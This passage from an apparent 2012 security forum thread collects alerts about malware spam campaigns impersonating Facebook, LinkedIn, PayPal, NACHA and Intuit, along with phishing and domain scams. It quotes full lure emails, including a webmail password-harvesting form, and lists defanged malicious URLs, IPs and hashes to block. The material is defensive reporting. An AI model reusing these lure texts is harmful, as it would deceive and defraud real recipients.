Added: snfgrhoykdcb.ddns.info and jdrxnlbyweco.ddns.info are also being used in this attack, although it they do not resolve at present.
Blocking .ddns.info and .ddns.name domains will probably not spoil your day. Blocking the 37.230.116.0/23 range might not either..."
___
Take a critical look at DNS blocking...
- http://h-online.com/-1731993
18 Oct 2012
:mad::mad:
-
Fake Facebook direct messages - malware campaign
FYI...
Fake Facebook direct messages - malware campaign ...
- http://blog.webroot.com/2012/10/19/m...d-in-the-wild/
Oct 19, 2012 - "... one of my Facebook friends sent me a direct message indicating that his host has been compromised, and is currently being used to send links to a malicious .zip archive through direct messages to to all of his Facebook friends...
Sample screenshot of the spamvertised direct download link:
> https://webrootblog.files.wordpress....e_campaign.png
... All of these redirect to hxxp://74.208.231.61 :81/l.php – tomascloud .com – AS8560... user is exposed to a direct download link of Picture15 .JPG .zip.
Detection rate: MD5: dfe23ad3d50c1cf45ff222842c7551ae * ... Trojan.Win32.Bublik.iez; Worm:Win32/Slenfbot..."
* https://www.virustotal.com/file/a6ab...is/1349355521/
File name: Picture15-JPG.scr
Detection ratio: 20/43
Analysis date: 2012-10-04 ..."
___
LinkedIn SPAM / cowonhorse .co
- http://blog.dynamoo.com/2012/10/link...onhorseco.html
19 Oct 2012 - "This fake LinkedIn spam leads to malware on cowonhorse .co:
From: LinkedIn.Invitations [mailto:4843D050@pes.sau48.org]
Sent: Fri 19/10/2012 10:29
Subject: Invitation
Hi [redacted],
User sent you an invitation to connect 6 days ago. How would you like to respond?
Accept Ignore Privately
Estelle Garrison
Interpublic Group (Executive Director Marketing PPS)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
==========
From: LinkedIn.Invitations [mailto:43DD0F0@cankopy.com]
Sent: Fri 19/10/2012 11:39
Subject: New invitation
Hi [redacted],
User sent you an invitation to connect 14 days ago. How would you like to respond?
Accept Ignore Privately
Carol Parks
Automatic Data Processing (Divisional Finance Director)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
==========
From: LinkedIn.Invitations [mailto:3A1665D92@leosanches.com]
Sent: Fri 19/10/2012 12:28
Subject: Invitation
Hi [redacted],
User sent you an invitation to connect 6 days ago. How would you like to respond?
Accept Ignore Privately
Rupert Nielsen
O'Reilly Automotive (Head of Non-Processing Infrastructure)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is on [donotclick]cowonhorse .co/links/observe_resources-film.php hosted on 74.91.118.239 (Nuclearfallout Enterprises, US). Nuclearfallout have hosted sites like this several times before..."
___
Fake Friendster emails lead to BlackHole exploit kit
- http://blog.webroot.com/2012/10/19/r...e-exploit-kit/
19 Oct 2012 - "Cybercriminals are currently spamvertising millions of emails, impersonating Friendster, in an attempt to trick its current and prospective users into clicking on a malicious link found in the email. Upon clicking on the link, users are exposed to the client-side exploits served by the latest version of the BlackHole exploit kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... sonatanamore .ru used to respond to the following IPs – 70.38.31.71; 202.3.245.13; 203.80.16.81; 213.251.162.65 ... Sample detection rate for the malicious iFrame loading script: friedster.html – MD5: c444036179aa371aebf9bae3e7cc5eef * ... Exploit.JS.Blacole; Trojan.JS.Iframe.acn
Upon successful client-side exploitation, the campaign drops MD5: 8fa93035ba01238dd7a55c378d1c2e40** on the affected host... Trojan-Ransom.Win32.PornoAsset.aeuz; Worm:Win32/Cridex.E
Upon execution, the sample phones back to 95.142.167.193 :8080/mx/5/A/in..."
* https://www.virustotal.com/file/2d91...is/1349356588/
File name: Friendster.html
Detection ratio: 12/43
Analysis date: 2012-10-04
** https://www.virustotal.com/file/94ff...690d/analysis/
File name: 8fa93035ba01238dd7a55c378d1
Detection ratio: 27/43
Analysis date: 2012-10-05
___
Cisco - Threat Outbreak Alerts
- http://tools.cisco.com/security/cent...utbreak.x?i=77
Fake UPS Payment Document Attachment E-mail Messages - October 19, 2012
Fake Shipment Notification E-mail Messages - October 19, 2012
Fake Product Quote Request E-mail Messages - October 19, 2012
Fake Changelog E-mail Messages- October 19, 2012
Fake Xerox Scan Attachment E-mail Messages - October 19, 2012
Fake Bill Statement E-mail Messages - October 19, 2012
Fake Bank Transfer Receipt E-mail Messages - October 19, 2012
Fake Payment Slip E-mail Messages - October 19, 2012
Fake Money Transfer Receipt E-mail Messages - October 19, 2012
Fake Purchase Order Confirmation E-mail Messages - October 19, 2012
Fake FedEx Parcel Delivery Failure Notification E-mail Messages - October 19, 2012
Fake Portuguese Health Alert Notification E-mail Messages - October 19, 2012
Fake Payment Slip Confirmation E-mail Message - October 19, 2012 ...
:mad:
-
SCAM-SPAM-and PHISH ...
FYI... multiple entries - SCAM-SPAM-and PHISH:
SCAM - worthless domain names: tsnetint .com and tsnetint .org
- http://blog.dynamoo.com/2012/10/scam...netintorg.html
22 Oct 2012 - "Another episode in a long-running domain scam, which attempts to get you to buy worthless domain names by scaremongering. In this case the fake company is called "Kenal investment Co. Ltd" (there are several legitimate firms with a similar name). If you get one of these, ignore it and don't give the scammers any money.
The domains quoted are tsnetint .com and tsnetint .org and the originating IP is 117.27.141.168, all hosted in deepest China.
From: bertram @tsnetint .com
Date: 22 October 2012 06:02
Subject: Confirmation of Registration
(Letter to the President or Brand Owner, thanks)
Dear President,
We are the department of Asian Domain Registration Service in China. Here I have something to confirm with you. We formally received an application on October 19, 2012 that a company claimed Kenal investment Co. Ltd were applying to register "dynamoo" as their Net Brand and some domain names through our firm.
Now we are handling this registration, and after our initial checking, we found the name were similar to your company's, so we need to check with you whether your company has authorized that company to register these names. If you authorized this, we would finish the registration at once. If you did not authorize, please let us know within 7 workdays, so that we could handle this issue better. After the deadline we will unconditionally finish the registration for Kenal investment Co. Ltd. Looking forward to your prompt reply.
Best Regards,
Bertram Hong
Registration Dept.
Office:Tel: 86 2885915586 || Fax: +86 2885912116
Address:9/F Libao building No,62 Kehua North Road,Wuhou District,Chengdu City,China ..."
___
SPAM with .gov URLs
- http://www.symantec.com/connect/blogs/spam-gov-urls
22 Oct 2012 Updated - "Symantec is observing an increase in spam messages containing .gov URLs. A screenshot of a sample message is below:
> https://www.symantec.com/connect/sit...govURL%201.png
Traditionally, .gov URLs have been restricted to government entities. This brings up the question of how spammers are using .gov URLs in spam messages.
The answer is on this webpage:
1.USA.gov is the result of a collaboration between USA.gov and bitly.com, the popular URL shortening service. Now, whenever anyone uses bitly to shorten a URL that ends in .gov or .mil, they will receive a short, trustworthy 1.usa.gov URL in return.
... While this feature has legitimate uses for government agencies and employees, it has also opened a door for spammers. By using an open-redirect vulnerability, spammers were able to set up a 1.usa.gov URL that leads to a spam website.
Using the above example:
[http ://]1.usa .gov/[REMOVED]/Rxpfn9
leads to
[http ://]labor.vermont .gov/LinkClick.aspx?link=http://workforprofit.net/[REMOVED]/?wwvxo
which leads to
[http ://]workforprofit .net/[REMOVED]/?wwvxo
The final spam page is a work-at-home scam website that has been designed to look like a financial news network website:
https://www.symantec.com/connect/sit...govURL%202.png
To add legitimacy to the website, spammers have designed it so that other links, such as the menu bar at the top and other news articles (not shown in the above picture), actually lead to the financial news website that it is spoofing. However, the links in the article all lead to a different website where the spammer tries to make the sale:
> https://www.symantec.com/connect/sit...0thumbnail.png
USA.gov provides data created any time anyone clicks on a 1.usa.gov URL (link available on this webpage). Analysis of data from the last seven days shows that this trend began on October 12. As of October 18, 43,049 clicks were made through 1.usa.gov shortened URLs to these spam domains:
consumeroption .net
consumerbiz .net
workforprofit .net
consumeroptions .net
consumerlifenet .net
consumerbailout .net
consumerlifetoday .net
consumerneeds .net
consumerstoday .net
consumerlivestoday .net
> https://www.symantec.com/connect/sit...govURL%204.png
... This chart shows the number of spam clicks made on a daily basis:
> https://www.symantec.com/connect/sit...govURL%205.png
While taking advantage of URL shorteners or an open-redirect vulnerability is not a new tactic, the fact that spammers can utilize a .gov service to make their own links is worrisome. Symantec encourages users to always follow best practices and exercise caution when opening links even if it is a .gov URL."
___
Phish for regular Webmail Accounts
- https://isc.sans.edu/diary.html?storyid=14356
Last Updated: 2012-10-22 - "I was looking through my spam folder today and saw an interesting phish. The phishing email is looking for email account information. Nothing new about that, except this one seemed to have a broad target range. Normally, these types of phishes are sent to .edu addresses not those outside of academia. From the email headers, this one was sent to the Handlers email which is a .org. A non-technical user, like many of my relatives, would probably respond to this. I could see this being successful against regular webmail users of Gmail, Hotmail, etc. especially if the verbiage was changed slightly. It could also be targeting those who may be enrolled in online universities... I have included the email below:
From: University Webmaster <university.m @usa .com>
Date: Fri, Oct 19, 2012 at 9:34 PM
Subject: Webmail Account Owner
To:
Dear Webmail Account Owner,
This message is from the University Webmail Messaging Center to all email account owners.
We are currently carrying out scheduled maintenance,upgrade of our web mail service and we are changing our mail host server,as a result your original password will be reset.
We are sorry for any inconvenience caused.
To complete your webmail email account upgrade, you must reply to this email immediately and provide the information requested below.
---
CONFIRM YOUR EMAIL IDENTITY NOW
E-mail Address:
User Name/ID:
Password:
Re-type Password:
---
Failure to do this will immediately render your email address deactivated from the University Webmail..."
___
"Copies of Policies" SPAM / fidelocastroo .ru
- http://blog.dynamoo.com/2012/10/copi...castrooru.html
22 Oct 2012 - "This spam leads to malware on fidelocastroo .ru:
Date: Mon, 22 Oct 2012 08:05:10 -0500
From: Twitter [c-FG6SPPPCGK63=D8154Z4.8N4-6042f@postmaster.twitter.com]
Subject: RE: Charley - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Charley HEALY,
The malicious payload is on [donotclick]fidelocastroo .ru:8080/forum/links/column.php hosted on the following IPs:
68.67.42.41 (Fibrenoire, Canada)
79.98.27.9 (Interneto Vizija, Lithunia)
190.10.14.196 (RACSA, Costa Rica)
202.3.245.13 (MANA, French Polynesia)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNET, US)
Plain list for copy and pasting:
68.67.42.41
79.98.27.9
190.10.14.196
202.3.245.13
203.80.16.81
209.51.221.247
Blocking these IPs should prevent any other attacks on the same server."
:mad:
-
Fake PayPal-NACHA-inTuit emails serve malware
FYI...
Fake PayPal emails serve malware
- http://blog.webroot.com/2012/10/23/p...serve-malware/
Oct 23, 2012 - "... cybercriminals are currently spamvertising millions of emails impersonating PayPal, in an attempt to trick its users into downloading and executing the malicious attachment found in the legitimate looking email...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....il_malware.png
Detection rate for the malicious archive: MD5: 9c2f2cabf00bde87de47405b80ef83c1 * ... Backdoor.Win32.Androm.fm. Once executed, the sample opens a backdoor on the infected host, allowing cybercriminals to gain complete control over the infected host..."
* https://www.virustotal.com/file/1f5f...is/1350578639/
File name: Notification_payment_08_15_2012.exe
Detection ratio: 39/43
Analysis date: 2012-10-18
___
- http://tools.cisco.com/security/cent...utbreak.x?i=77
Fake PayPal Account Verification E-mail Messages - October 22, 2012
Fake Payment Confirmation E-mail Messages - October 22, 2012
Fake Picture Link E-mail Messages- October 22, 2012
Fake Portuguese Loan Approval E-mail Messages - October 22, 2012
Malicious Personal Photograph Attachment E-mail Messages - October 22, 2012
Fake UPS Payment Document Attachment E-mail Messages - October 22, 2012
Fake FedEx Parcel Delivery Failure Notification E-mail Messages - October 22, 2012
Fake Changelog E-mail Messages - Updated October 22, 2012
Fake Purchase Order Confirmation E-mail Messages - October 22, 2012...
___
NACHA SPAM / bwdlpjvehrka.ddns .info
- http://blog.dynamoo.com/2012/10/nach...addnsinfo.html
23 Oct 2012 - "This fake NACHA spam leads to malware on bwdlpjvehrka.ddns .info:
Date: Tue, 23 Oct 2012 05:44:05 +0200
From: "noreply@direct.nacha.org"
Subject: Notification about the rejected Direct Deposit payment
Herewith we are informing you, that your most recent Direct Deposit via ACH transaction (#914555512836) was cancelled, due to your current Direct Deposit software being out of date. Please use the link below to enter the secure section of our web site and see the details::
Please contact your financial institution to acquire the new version of the software.
Sincerely yours
ACH Network Rules Department
NACHA | The Electronic Payments Association
13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171
Phone: 703-561-1100 Fax: 703-787-0996
The malicious payload is at [donotclick]bwdlpjvehrka.ddns .info/links/calls_already_stopping.php hosted on 78.24.222.16 (TheFirst-RU, Russia). Blocking this IP address would be a good move."
___
Intuit SPAM / montrealhotpropertyguide .com
- http://blog.dynamoo.com/2012/10/intu...yguidecom.html
23 Oct 2012 - "This fake Intuit spam leads to malware on montrealhotpropertyguide .com:
Date: Tue, 23 Oct 2012 14:45:14 +0200
From: "Intuit QuickBooks Customer Service" [35378B458 @aubergedesbichonnieres .com]
Subject: Intuit QuickBooks Order
Dear [redacted],
Thank you for placing an order with Intuit QuickBooks!
We have received your payment information and it is currently being processed.
ORDER INFORMATION
Order #: 366948851674
Order Date: Oct 22, 2012
[ View order ]
Qty Item Price
1 Intuit QuickBooks Pro Download 2 2012 $183.96***
Subtotal:
Sales Tax:
Total for this Order: $183.96 $0.00 $183.96
*Appropriate credit will be applied to your account.
Please Note: Sales tax calculations are estimated. The final sales tax calculation will comply with local regulations.
NEED HELP?
Questions about your order? Please visit Customer Service.
Join Us On Facebook
Close More Sales
Save Time
Privacy | Legal | Contact Us | About Intuit
You have received this business communication as part of our efforts to fulfill your request or service your account. You may receive this and other business communications from us even if you have opted out of marketing messages.
If you receive an email message that appears to come from Intuit but that you suspect is a phishing email, please forward it immediately to spoof @intuit .com. Please visit http ://security.intuit .com/ for additional security information.
Please note: This email was sent from an auto-notification system that cannot accept incoming email. Please do not reply to this message.
� 2012 Intuit Inc. or its affiliates. All rights reserved.
The malicious payload is on [donotclick]montrealhotpropertyguide .com/links/showed-clearest-about.php hosted on 64.111.26.15 (Data 102, US)."
:mad: